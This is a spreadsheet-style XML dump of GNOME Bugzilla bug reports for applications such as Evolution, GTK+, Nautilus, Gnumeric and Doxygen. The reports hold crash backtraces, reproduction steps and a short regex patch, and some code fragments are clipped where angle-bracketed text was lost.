#1  0x00000000 in ?? ()</t>
  </si>
  <si>
    <t>GLIB-513483</t>
  </si>
  <si>
    <t>Doc fix for g_app_info_get_default_for_uri_scheme ()</t>
  </si>
  <si>
    <t>The doc says that is currently unimplemented but it is actually implemented (at least on UNIX).</t>
  </si>
  <si>
    <t>EVOLUTION-269815</t>
  </si>
  <si>
    <t>Cannot quit while updating vfolders</t>
  </si>
  <si>
    <t>If you start Evolution and then immediately quit and:
a) you have vfolders configured and
b) you use IMAP
Evolution will take a very long time to quit. It seems to not be able to
cancel updating its vfolders.
Today's CVS.</t>
  </si>
  <si>
    <t>EPIPHANY-300725</t>
  </si>
  <si>
    <t>New dummy topic is retained even when Cancel is pressed</t>
  </si>
  <si>
    <t>1. Press Ctrl+D to file a new bookmark
2. Click the New Topic button
3. Press Cancel
Expected results: no bookmark is added no topic is added
Actual results: no bookmark is added but a new topic Enter a topic is created</t>
  </si>
  <si>
    <t>GDM-415181</t>
  </si>
  <si>
    <t>update for ConsoleKit parameters</t>
  </si>
  <si>
    <t>Here is an update for the latest changes to the ConsoleKit parameters.  I'm sorry that I just missed the code freeze - I tried :)</t>
  </si>
  <si>
    <t>GNUMERIC-153544</t>
  </si>
  <si>
    <t>CRASH on setting autosave to 3.5 minutes</t>
  </si>
  <si>
    <t>When setting the autosave to 3.5 minutes gnumeric crashes
1) new gnumeric
2) select Tools-&gt; Autosave
3) click the checkbox
4.1) in the text entry start typing '3'
=&gt;the Okay button is active everything looks okay
4.2) finish typing '.5'  (so the entry is 3.5)
=&gt; the OK button is inactive looks like the entry is of the wrong type
4.3) hit 
=&gt; crash
gdb gives:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1092934432 (LWP 5036)]
0x40ee487f in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
(gdb) bt
#0  0x40ee487f in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#1  0x00000000 in ?? ()
#2  0x00000000 in ?? ()
#3  0x00000000 in ?? ()
#4  0x4105a464 in g_hash_table_lookup () from /usr/lib/libglib-2.0.so.0
#5  0x41023e47 in pthread_mutex_lock () from /lib/tls/libpthread.so.0
(gdb)</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-157331</t>
  </si>
  <si>
    <t>network-admin trashed /etc/network/interfaces when started fresh without an existing iface's file.</t>
  </si>
  <si>
    <t>This bug has been reported here: https://bugzilla.ubuntu.com/2221
I ran into this while trying to reproduce #2177. After wiping out my existant
/etc/network/interfaces file for testing purposes and executing network-admin
I've walked through the assistant to create a new configuration. My config was
for eth0 NIC (Intel EtherExpress PRO 10/100) using DHCP.
as I am used to starting and stopping the network from CLI I tried  this:
 warty:/etc/network# ifup eth0
 /etc/network/interfaces:1: too few parameters for iface line
 ifup: couldn't read interfaces file /etc/network/interfaces
This also causes the system to be practically networkless as the iface can't be
brought up.
the assistant created file:
iface   loopback &lt;--- this is the problem if I comment this line everything is
ok - ifup and ifdown are not upset anymore.
auto lo
iface lo inet loopback
address 127.0.0.1
netmask 255.0.0.0
broadcast 127.255.255.255
network 127.0.0.0
iface eth0 inet dhcp
name Ethernet LAN card
auto eth0
I reckon this has something to do with the debian backend however the hard I
tried I couldn't find where in the code the scripts parse the frontend's XML and
prepare the debian specific files.
This might need a very little adjustment to fix unless there's somethign wrong
with the frontend as well.
I've just tested and I've the problem here too.
gst version is 1.0.0</t>
  </si>
  <si>
    <t>GTK+-525550</t>
  </si>
  <si>
    <t>GTK+ 2.13.0 GtkCurve test fails</t>
  </si>
  <si>
    <t>Please describe the problem:
bash-3.2$ tests/objecttests -p /properties/GtkCurve
/properties/GtkCurve: 
Gtk-CRITICAL **: gtk_widget_set_size_request: assertion `width &gt;= -1' failed
aborting...
Aborted
Steps to reproduce:
1. ./configure
2. make
3. make check
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:
glib-2.16.1 pango-1.20.0 cairo-1.5.14 atk-1.22.0</t>
  </si>
  <si>
    <t>METACITY-83576</t>
  </si>
  <si>
    <t>No resize indication at the top corner in Gorilla or Crux</t>
  </si>
  <si>
    <t>Resize works in Atlanta but not in Gorilla or Crux -
While in Atlanta mouse cursor turns into resize one when 
it is on the bottom line of application's title window
but it does not in Gorilla or Crux - anywhere..</t>
  </si>
  <si>
    <t>GNOPERNICUS-116971</t>
  </si>
  <si>
    <t>still depends on linc</t>
  </si>
  <si>
    <t>The gnopernicus build (from HEAD at least) still requires the presence of
linc and so fails to build for me. Michael can you help them clean this up?</t>
  </si>
  <si>
    <t>NAUTILUS-46855</t>
  </si>
  <si>
    <t>History Sidebar defaults to showing the bottom of the history list versus the more recent history</t>
  </si>
  <si>
    <t xml:space="preserve">The summary could probably be changed to better describe this. Basically when
there are more items than can fit in the History pane it enters into a
scrolling mode as expected. However instead of listing the most recent history
and making you scroll to the older history it shows the older history and make
you scroll to the more recent History.
OS: Red Hat 7.0
Nautilus: Hourly Build Feb 21 00:46:51 2001.
Steps to Reproduce:
1. Launch Nautilus
2. Open the History Sidebar pane.
3. Shrink Nautilus vertically until you can only see 3 entries in the History pane.
Note: Currently you will only have one entry (your home directory).
4. Type '/tmp' into the location bar and hit enter.
5. Type '/etc' into the location bar and hit enter.
6. Type '/usr' into the location bar and hit enter.
Expected Results:
Your History pane should show the 3 most recent entries like this.
/usr
/etc
/tmp
and allow you to scroll down to your home directory '/h/duane' in my case.
Actual Results:
The History pane shows the oldest entries (at the bottom of the list):
/etc
/tmp
/h/duane
and makes you scroll up to the most recent entries.
Notes:
-&gt; I can show this to anyone in person or if a screen shot would be helpful I
can do that as well.
-&gt; The impact of this is that when you have a large list of history eventually
you are going to fill the History pane and since it is showing the older History
items it will not change VISIBLY according to the changes you are making.
------- Additional Comments From sullivan@eazel.com 2001-02-21 18:59:51 ----
I think the whole issue here is that (without user intervention) the History
list in the sidebar is scrolled to the bottom when there are enough items that
you have to scroll. This is often the right behavior for lists but is not the
right behavior for this list since the most interesting items are the ones at
top. So we need to find a way to inhibit GtkCList's desire to scroll to the last
items (I'm not sure exactly where this is triggered currently). Obviously not
important for 1.0.
------- Additional Comments From don@eazel.com 2001-02-21 21:27:15 ----
Not a 1.0 blocker.
------- Additional Comments From eli@eazel.com 2001-03-26 11:20:23 ----
SPAAAAAAAAAM! 
(Jon Allen has taken these components QA Assigning bugs to him.)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:00 -------
The original reporter (duane@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>duane</t>
  </si>
  <si>
    <t>GTK+-374378</t>
  </si>
  <si>
    <t>Crash as GTK tries to blink cursor in defocused spinbutton: file gtkentry.c: line 5260 (blink_cb): assertion failed: (GTK_WIDGET_HAS_FOCUS (entry))</t>
  </si>
  <si>
    <t>(Aside note: GIMP seems to be receiving a preferential treatment from GTK devs.
On http://gtk.org/bugs.html they say: Bugs that can be reproduced within the
GIMP are almost as good as bugs that can be reproduced in testgtk. Given
Inkscape's importance to the community - it's one of the most popular GTK apps
- I think Inkscape deserves no less. As for this particular bug I have examined it closely and I'm convinced that it's a bug in GTK not in Inkscape code but it would be quite difficult for me to provide a test app. So I'm hoping you will be able to reproduce it by running Inkscape SVN as explained in detail below.)
In SVN version Inkscape implemented interruptible display. This means that while redrawing screen Inkscape stops from time to time and runs several Gtk::Main::iteration() if there are  Gtk::Main::events_pending(). This helped to improve the editing experience tremendously making Inkscape much more responsive: for example you can now zoom in or out without waiting for the current screen to fully redraw. However this also revealed problems with GTK.
In the Fill and Stroke dialog we have Blur controls: a slider and a spinbutton both connected to the same GtkAdjustment. These controls change the blur of the selected object. Rendering blurred objects is quite slow so if you set a large blur Inkscape will run main loop iterations while redrawing its canvas. The sequence of events is like this:
- The user clicks in the Blur spinbutton giving it focus. 
- The user then drags the Blur slider.
- This fires the adjustment's value-change callback.
- The callback changes the document and causes canvas redraw.
- While redrawing canvas (so still within the value-changed callback) Inkscape runs Gtk::Main::iteration() to process pending events.
- One of the events-to-process seems to be the blink spinbutton cursor event that GTK generates and tries to process. However the spinbutton no longer has focus - it was moved to the slider when it was dragged! So GTK crashes with:
(inkscape:5018): Gtk-WARNING **: GtkEntry - did not receive focus-out-event. If
you connect a handler to this signal it must return FALSE so the entry gets the event as well
Gtk-ERROR **: file gtkentry.c: line 5260 (blink_cb): assertion failed:
(GTK_WIDGET_HAS_FOCUS (entry))
aborting...
This bug was reported by an Inkscape user:
http://sourceforge.net/tracker/index.php?func=detail&amp;aid=1580903&amp;group_id=93438&amp;atid=604306
Obviously something is very wrong here. GTK seems to get out of sync with itself and tries to blink a defocused spinbutton. 
This is only one of the troubles another is that typing a value into the Blur spinbutton (e.g. 20) and pressing Enter seems to produce multiple value-changed events: while redrawing screen after the change a main loop iteration brings ANOTHER value-changed which ups blur to 40 then to 80 etc until it reaches the maximum and then stops. 
The root problem seems to be that GTK is unable to cope with the situation where a value-changed callback runs a main loop iteration _from itself_. Please review your code with an eye to this. Issuing of events must not depend on whether the last value-changed callback has finished or is still running!
For now I fixed this crash in Inkscape by disabling interruptible display while the blur adjustment callback updates the document and redraws. Of course it's not a real fix just a workaround which damages responsiveness of the program. Please do a proper fix in GTK or explain me what I am doing wrong if anything. 
To experience this bug build Inkscape SVN with this change reverted:
http://svn.sourceforge.net/viewvc/inkscape/inkscape/trunk/src/dialogs/object-properties.cpp?r1=13242&amp;r2=13257&amp;sortby=date
Please contact me with any questions or if you need any help on building/running Inkscape.
Additional info: I tried using gtk_main_iteration_do instead of Gtk::Main::Iteration but that didn't fix it. Also passing true or false to Gtk::Main::Iteration does not affect the bug.</t>
  </si>
  <si>
    <t>buliabyak</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-324852</t>
  </si>
  <si>
    <t>Provide info about commenters on show_bug.cgi</t>
  </si>
  <si>
    <t>Olav mentioned in IRC that he wanted to have developers marked differently on show_bug.cgi so that people could easily tell which comments came from the developers of the module (much easier than clicking on the icon light bulb for each and every person).  Sounds like a great idea.
Extending the idea a little (and this is now a lot like Behdad's Bugzilla ideas on the wiki and was probably the actual source of the idea) we could possibly also provide info like whether a commenter watches the product whether the person is really active in bugzilla (lots of bug reports/comments/bugs-closed or something) whether they're a gnome hacker and/or maybe other stuff.  I'm not completely sure which info and how much we'd want but I thought I'd file the bug so we don't forget.</t>
  </si>
  <si>
    <t>GIMP-157722</t>
  </si>
  <si>
    <t>A texttool bug that causes the ugly black console screen to appear with terminal fonts and sytem fonts!?</t>
  </si>
  <si>
    <t>With WinXP Home and a Radeon 9600xt with catalyst drivers. Open the texttool 
button on the menu window and go to tool options scroll through the list of 
fonts. When it comes across some of the neccesary windows fonts like fixed 
system system terminal and one named like egeom something The ugly console 
screen fires up and displays this:
** (gimp-2.0.exe:1692): WARNING **: Error in FT_Set_Char_Size: 23
Again with most of these console windows if you shut it down it crashes Gimp2</t>
  </si>
  <si>
    <t>spikeq2</t>
  </si>
  <si>
    <t>GNOME-PANEL-334295</t>
  </si>
  <si>
    <t>Applets' handles not correctly displayed</t>
  </si>
  <si>
    <t>Please describe the problem:
When using a background image for the panel handles
from applets are not correctly displayed (black rectangles
instead of the handles)
Steps to reproduce:
1. Add the notification applet to the panel (for ex.)
2. Change panel's properties 
3. Add a background image
Actual results:
Expected results:
Does this happen every time?
Happends every time.
Other information:
Gnome 2.13.92
Gnome-panel 2.13.92
Gtk+ 2.8.13
Glib 2.10.1
Gtk Theme: Clearlooks (bug seems to be independant from themes)</t>
  </si>
  <si>
    <t>EVOLUTION-357811</t>
  </si>
  <si>
    <t>Evolution Mail: La recherche dans tous l...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
La recherche dans tous les champs renvoie toute les entrÃ©e il n'y a pas de tri. dans les contacts.
In contacts searching for something in all the areas send all the entries. Not the one I'm searching for. 
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.0 2006-09-04 (Ubuntu)
BugBuddy Version: 2.16.0</t>
  </si>
  <si>
    <t>nemolivier</t>
  </si>
  <si>
    <t>DOXYGEN-473679</t>
  </si>
  <si>
    <t>PATCH: doxygen skips function if return type contains a round parenthesis.</t>
  </si>
  <si>
    <t>I recently added a comment to bug #145294 where I was including a testcase showing an error that I though to be a variant of #145294.
Now that I have tracked down the real problem I can say that I have found instead a new bug unrelated to #145294.
Here below I propose a minimal patch for the new bug (not #145294).
The testcase showing the bug can be found in my comment to #145294 that is
  http://bugzilla.gnome.org/show_bug.cgi?id=145294#c10
To make it really brief in the following situation (and with a proper configuration extracting all):
template 
class Bug1 {
public:
  typename Enable_If::type ok()
  typename Enable_If::type error()
}
doxygen-1.5.3-20070902 will properly document function ok()
but it will skip function error() issuing the following warning:
bug1.cc:7: Warning: documented function `Enable_If::type Bug1::error' was not declared or defined.
The correction for this problem is quite simple:
=================================
$ diff -uN doxygen.cpp.~1.232.~ doxygen.cpp
--- doxygen.cpp.~1.232.~        2007-09-02 21:15:31.000000000 +0200
+++ doxygen.cpp 2007-09-04 19:55:53.000000000 +0200
@@ -28277 +28277 @@
       }
-      static QRegExp re(([a-z_A-Z0-9: ]*[ 
+      static QRegExp re(([a-z_A-Z0-9: ]*[ 
       if (!rootNav-&gt;parent()-&gt;name().isEmpty() &amp;&amp;
           (rootNav-&gt;parent()-&gt;section() &amp; Entry::COMPOUND_MASK) &amp;&amp; 
           cd &amp;&amp;
$
=================================
According to the comments in the sources of Doxygen regular expression
`re' is meant to capture the case of a function pointer.
Here the intended pattern was ...(...* but the (quoted) * was wrongly said to be optional. Hence I made it non-optional by replacing * by +
NOTE 1: I know that the solution I am proposing is not going to solve all the variants of this problems in this fragment of code that is one can produce more complex testcases still incurring in a spurious warning.
However as far as I can understand the one I am proposing is indeed the partial solution that was really meant by Dimitri when coding this regexp test (see also the comment saying do some fuzzy things to exclude function pointers).
NOTE 2: on line 2608 of doxygen.cpp (inside function addMethodToClass) there is another occurrence of the same (buggy) regular expression:
  int li
  static QRegExp re(([a-z_A-Z0-9: ]*[ 
I suspect that the same correction could be aplpied here too but I don't have a testcase triggering the error.</t>
  </si>
  <si>
    <t>zaffanella</t>
  </si>
  <si>
    <t>EVOLUTION-219101</t>
  </si>
  <si>
    <t>Crash on Send/Receive and/or Reply</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.1
Synopsis: Crash on Send/Receive and/or Reply
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I had accidentally clicked both Send/Receive and Reply one after the
other.  As the Send/Receive window began to appear the Mail process
crashed.
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 31045)]
[New Thread 2049 (LWP 31061)]
[New Thread 1026 (LWP 31062)]
[New Thread 4099 (LWP 31067)]
[New Thread 3076 (LWP 31064)]
[New Thread 6149 (LWP 1358)]
[New Thread 7174 (LWP 1511)]
0x40f79e29 in __wait4 () from /lib/libc.so.6
#0  0x40f79e29 in __wait4 () from /lib/libc.so.6
#1  0x40ff6050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401fb8de in waitpid (pid=23952 stat_loc=0xbffff04c options=0)
    at wrapsyscall.c:172
#3  0x40ad3456 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809d58d in message_browser_get_type ()
#5  0x401f94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 0 esi = 139440632 ebp = 3221222424 esp = 3221222424 ebx = 137022872 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1074105358 cs = 35 __csh = 0 eflags = 66182 esp_at_signal = 3221222424 ss = 43 __ssh = 0 fpstate = 0xbffff198 oldmask = 2147483648 cr2 = 40}) at signals.c:97
#6  
#7  camel_mime_part_get_content_type (mime_part=0x0) at camel-mime-part.c:516
#8  0x080a9989 in e_msg_composer_add_message_attachments ()
#9  0x0807d5da in send_to_url ()
#10 0x0807dd14 in mail_reply ()
#11 0x0807de4c in reply_to_sender ()
#12 0x405d45d5 in impl_Bonobo_UIComponent_execVerb (servant=0x8292a24 
    cname=0x89554d4 MessageReplySender ev=0xbffff5f0)
    at bonobo-ui-component.c:129
#13 0x40583584 in _ORBIT_skel_Bonobo_UIComponent_execVerb (
    _ORBIT_servant=0x8292a24 _ORBIT_recv_buffer=0x8130a50 ev=0xbffff5f0 
    _impl_execVerb=0x405d450c )
    at Bonobo-skels.c:4339
#14 0x40e7d210 in ORBit_POA_handle_request (recv_buffer=0x8130a50 
    poa=0x810e310) at orbit_poa.c:513
#15 0x40e7f47a in ORBit_handle_incoming_request (recv_buffer=0x8130a50)
    at server.c:90
#16 0x40e7f6a1 in ORBit_handle_incoming_message (recv_buffer=0x8130a50)
    at server.c:160
#17 0x40e95ce4 in giop_main_handle_connection (connection=0x8133100)
    at connection.c:1214
#18 0x40e3dab9 in orb_handle_connection (source=0x810c9f8 cond=G_IO_IN 
    cnx=0x8133100) at oaf-mainloop.c:70
#19 0x40eb2a7a in g_io_unix_dispatch (source_data=0x810ca10 
    current_time=0xbffff780 user_data=0x8133100) at giounix.c:137
#20 0x40eb4055 in g_main_dispatch (dispatch_time=0xbffff780) at gmain.c:656
#21 0x40eb4659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#22 0x40eb47e8 in g_main_run (loop=0x80fe740) at gmain.c:935
#23 0x40d4b27b in gtk_main () at gtkmain.c:524
#24 0x4059453b in bonobo_main () at bonobo-main.c:284
#25 0x0809d7bd in main ()
#26 0x40ee2306 in __libc_start_main (main=0x809d5d8  argc=3 
    ubp_av=0xbffff9a4 init=0x80661f0  fini=0x80d3170  
    rtld_fini=0x4000d2dc  stack_end=0xbffff99c)
    at ../sysdeps/generic/libc-start.c:129
Thread 7 (Thread 7174 (LWP 1511)):
#0  0x40ef4966 in __sigsuspend (set=0xbefff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f8d61 in __pthread_wait_for_restart_signal (self=0xbefffc00)
    at pthread.c:969
#2  0x401f4ee4 in pthread_cond_wait (cond=0x82db870 mutex=0x8392320)
    at restart.h:34
#3  0x40082466 in e_msgport_wait (mp=0x82db848) at e-msgport.c:198
#4  0x40082a8e in thread_dispatch (din=0x83922d0) at e-msgport.c:517
#5  0x401f5f87 in pthread_start_thread (arg=0xbefffc00) at manager.c:284
Thread 6 (Thread 6149 (LWP 1358)):
#0  0x40ef4966 in __sigsuspend (set=0xbf1ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f8d61 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:969
#2  0x401f4ee4 in pthread_cond_wait (cond=0x8131ac0 mutex=0x8131aa0)
    at restart.h:34
#3  0x40082466 in e_msgport_wait (mp=0x8131a78) at e-msgport.c:198
#4  0x40082a8e in thread_dispatch (din=0x8131a28) at e-msgport.c:517
#5  0x401f5f87 in pthread_start_thread (arg=0xbf1ffc00) at manager.c:284
Thread 5 (Thread 3076 (LWP 31064)):
#0  0x40ef4966 in __sigsuspend (set=0xbf3ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f8d61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x401f4ee4 in pthread_cond_wait (cond=0x8131a18 mutex=0x81319f8)
    at restart.h:34
#3  0x40082466 in e_msgport_wait (mp=0x81319d0) at e-msgport.c:198
#4  0x40082a8e in thread_dispatch (din=0x8131980) at e-msgport.c:517
#5  0x401f5f87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 4099 (LWP 31067)):
#0  0x40ef4966 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f8d61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x401f4ee4 in pthread_cond_wait (cond=0x8131ac0 mutex=0x8131aa0)
    at restart.h:34
#3  0x40082466 in e_msgport_wait (mp=0x8131a78) at e-msgport.c:198
#4  0x40082a8e in thread_dispatch (din=0x8131a28) at e-msgport.c:517
#5  0x401f5f87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 31062)):
#0  0x40ef4966 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401f8d61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x401f4ee4 in pthread_cond_wait (cond=0x8131970 mutex=0x8131950)
    at restart.h:34
#3  0x40082466 in e_msgport_wait (mp=0x8131928) at e-msgport.c:198
#4  0x40082a8e in thread_dispatch (din=0x81318d8) at e-msgport.c:517
#5  0x401f5f87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 31061)):
#0  0x40fa4c6c in __poll (fds=0x814b20c nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x401f5d0e in __pthread_manager (arg=0x19) at manager.c:140
Thread 1 (Thread 1024 (LWP 31045)):
#0  0x40f79e29 in __wait4 () from /lib/libc.so.6
#1  0x40ff6050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401fb8de in waitpid (pid=23952 stat_loc=0xbffff04c options=0)
    at wrapsyscall.c:172
#3  0x40ad3456 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0809d58d in message_browser_get_type ()
#5  0x401f94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 0 esi = 139440632 ebp = 3221222424 esp = 3221222424 ebx = 137022872 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1074105358 cs = 35 __csh = 0 eflags = 66182 esp_at_signal = 3221222424 ss = 43 __ssh = 0 fpstate = 0xbffff198 oldmask = 2147483648 cr2 = 40}) at signals.c:97
#6  
#7  camel_mime_part_get_content_type (mime_part=0x0) at camel-mime-part.c:516
#8  0x080a9989 in e_msg_composer_add_message_attachments ()
#9  0x0807d5da in send_to_url ()
#10 0x0807dd14 in mail_reply ()
#11 0x0807de4c in reply_to_sender ()
#12 0x405d45d5 in impl_Bonobo_UIComponent_execVerb (servant=0x8292a24 
    cname=0x89554d4 MessageReplySender ev=0xbffff5f0)
    at bonobo-ui-component.c:129
#13 0x40583584 in _ORBIT_skel_Bonobo_UIComponent_execVerb (
    _ORBIT_servant=0x8292a24 _ORBIT_recv_buffer=0x8130a50 ev=0xbffff5f0 
    _impl_execVerb=0x405d450c )
    at Bonobo-skels.c:4339
#14 0x40e7d210 in ORBit_POA_handle_request (recv_buffer=0x8130a50 
    poa=0x810e310) at orbit_poa.c:513
#15 0x40e7f47a in ORBit_handle_incoming_request (recv_buffer=0x8130a50)
    at server.c:90
#16 0x40e7f6a1 in ORBit_handle_incoming_message (recv_buffer=0x8130a50)
    at server.c:160
#17 0x40e95ce4 in giop_main_handle_connection (connection=0x8133100)
    at connection.c:1214
#18 0x40e3dab9 in orb_handle_connection (source=0x810c9f8 cond=G_IO_IN 
    cnx=0x8133100) at oaf-mainloop.c:70
#19 0x40eb2a7a in g_io_unix_dispatch (source_data=0x810ca10 
    current_time=0xbffff780 user_data=0x8133100) at giounix.c:137
#20 0x40eb4055 in g_main_dispatch (dispatch_time=0xbffff780) at gmain.c:656
#21 0x40eb4659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#22 0x40eb47e8 in g_main_run (loop=0x80fe740) at gmain.c:935
#23 0x40d4b27b in gtk_main () at gtkmain.c:524
#24 0x4059453b in bonobo_main () at bonobo-main.c:284
#25 0x0809d7bd in main ()
#26 0x40ee2306 in __libc_start_main (main=0x809d5d8  argc=3 
    ubp_av=0xbffff9a4 init=0x80661f0  fini=0x80d3170  
    rtld_fini=0x4000d2dc  stack_end=0xbffff99c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40f79e29 in __wait4 () from /lib/libc.so.6
#0  0x40f79e29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40ff6050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x401fb8de in waitpid (pid=23952 stat_loc=0xbffff04c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff04c
options = 0
result = 0
oldtype = 0
#3  0x40ad3456 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1079630220
in_segv = 1
pid = 0
#4  0x0809d58d in message_browser_get_type ()
No symbol table info available.
#5  0x401f94c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 0 esi = 139440632 ebp = 3221222424 esp = 3221222424 ebx = 137022872 edx = 0 ecx = 0 eax = 0 trapno = 14 err = 4 eip = 1074105358 cs = 35 __csh = 0 eflags = 66182 esp_at_signal = 3221222424 ss = 43 __ssh = 0 fpstate = 0xbffff198 oldmask = 2147483648 cr2 = 40}) at signals.c:97
	in signals.c
self = 0x40202460
in_sighandler = 0x0
self = 0x40202460
in_sighandler = 0x0
#6  
No locals.
#7  camel_mime_part_get_content_type (mime_part=0x0) at camel-mime-part.c:516
	in camel-mime-part.c
mime_part = (CamelMimePart *) 0xfffffe00
</t>
  </si>
  <si>
    <t>beland</t>
  </si>
  <si>
    <t>TRACKER-407348</t>
  </si>
  <si>
    <t>Search Tool</t>
  </si>
  <si>
    <t>Add bugzilla product to .desktop file for tracker-search-tool</t>
  </si>
  <si>
    <t>Currently the .desktop file for tracker-search-tool doesn't list the bugzilla component so when it crashes bug-buddy doesn't know where to file a bug.  This means that the user has to manually open a bug and copy the stack trace into the bug report.  If you add the X-GNOME-Bugzilla-* fields to the .desktop file I believe bug-buddy will be able to file the crasher bugs automatically.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-395609</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>leaks in gnome-network-preferences</t>
  </si>
  <si>
    <t>Patch follows.</t>
  </si>
  <si>
    <t>EVOLUTION-257579</t>
  </si>
  <si>
    <t>'Move to calendar' window flaws</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: Evolution
Priority: Normal
Version: GNOME2.6. 1.5.7
Gnome-Distributor: GNOME.Org
Synopsis: 'Move to calendar' window flaws
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: 1.5.7
Description:
Steps to reproduce the problem:
1. Right click on an appointment
2. choose Move to calendar ...
Actual Results:
1) The window is too small (y size is just about 150 pixel) there are
just 3 visible list items
2) The title of the windows says Select source
3) No list item is selected.
Expected Results:
1) Make the window at least 400 pixel high
2) Change the window title (despite there is a little descriptive text
at the window's top saying Select destination calendar
3) The calendar where the appointment is currently in should be
pre-selected
How often does this happen?
always
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNOME-UTILS-135869</t>
  </si>
  <si>
    <t>use of actions crashes logview</t>
  </si>
  <si>
    <t>This was tested with gnome-utils 2.2.1 and 2.4.1.
Howto reproduce:
Open /var/log/messages
Monitor /var/log/messages (File/Monitor then Add /var/log/messages)
Click Actions button to enter an action and click Add
Tag: messages
Log name: /var/log/messages
Process: logger
Message: test
Action: /usr/bin/X11/xmessage test
Description: test description
Click Ok and Ok again on 'Monitor Options'
Monitoring Logs window pops up
logger -t logger -p user.warn test
The new message is shown in Monitoring Logs but get in ~/.xsession-errors:
Xlib: unexpected async reply (sequence 0x4cca)!
Xlib: sequence lost (0x14c78 &gt; 0x4c78) in reply type 0x0!
The program 'gnome-system-log' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadImplementation (server does not implement operation)'.
  (Details: serial 19576 error_code 17 request_code 20 minor_code 0)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
Xlib: sequence lost (0x10360 &gt; 0x4dbb) in reply type 0x1!
Clicking in monitor window causes it to not repaint and it must be killed.
attached is strace</t>
  </si>
  <si>
    <t>LIBGOFFICE-369662</t>
  </si>
  <si>
    <t>Checked g_free calls</t>
  </si>
  <si>
    <t>g_free accepts NULL.
Checked g_free at goffice/component/go-component-factory.c:106
Checked g_free at goffice/component/go-component.c:56
Checked g_free at goffice/component/go-component.c:111
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:300
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:304
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:308
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:667
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:682
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-line.c:687
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-polygon.c:243
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-polygon.c:441
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-text.c:784
Checked g_free at goffice/cut-n-paste/foocanvas/foo-canvas-text.c:1353
Checked g_free at goffice/data/go-data-simple.c:51
Checked g_free at goffice/data/go-data-simple.c:498
Checked g_free at goffice/graph/gog-plot.c:76
Checked g_free at goffice/graph/gog-plot.c:78
Checked g_free at goffice/graph/gog-plot.c:440
Checked g_free at goffice/graph/gog-plot.c:446
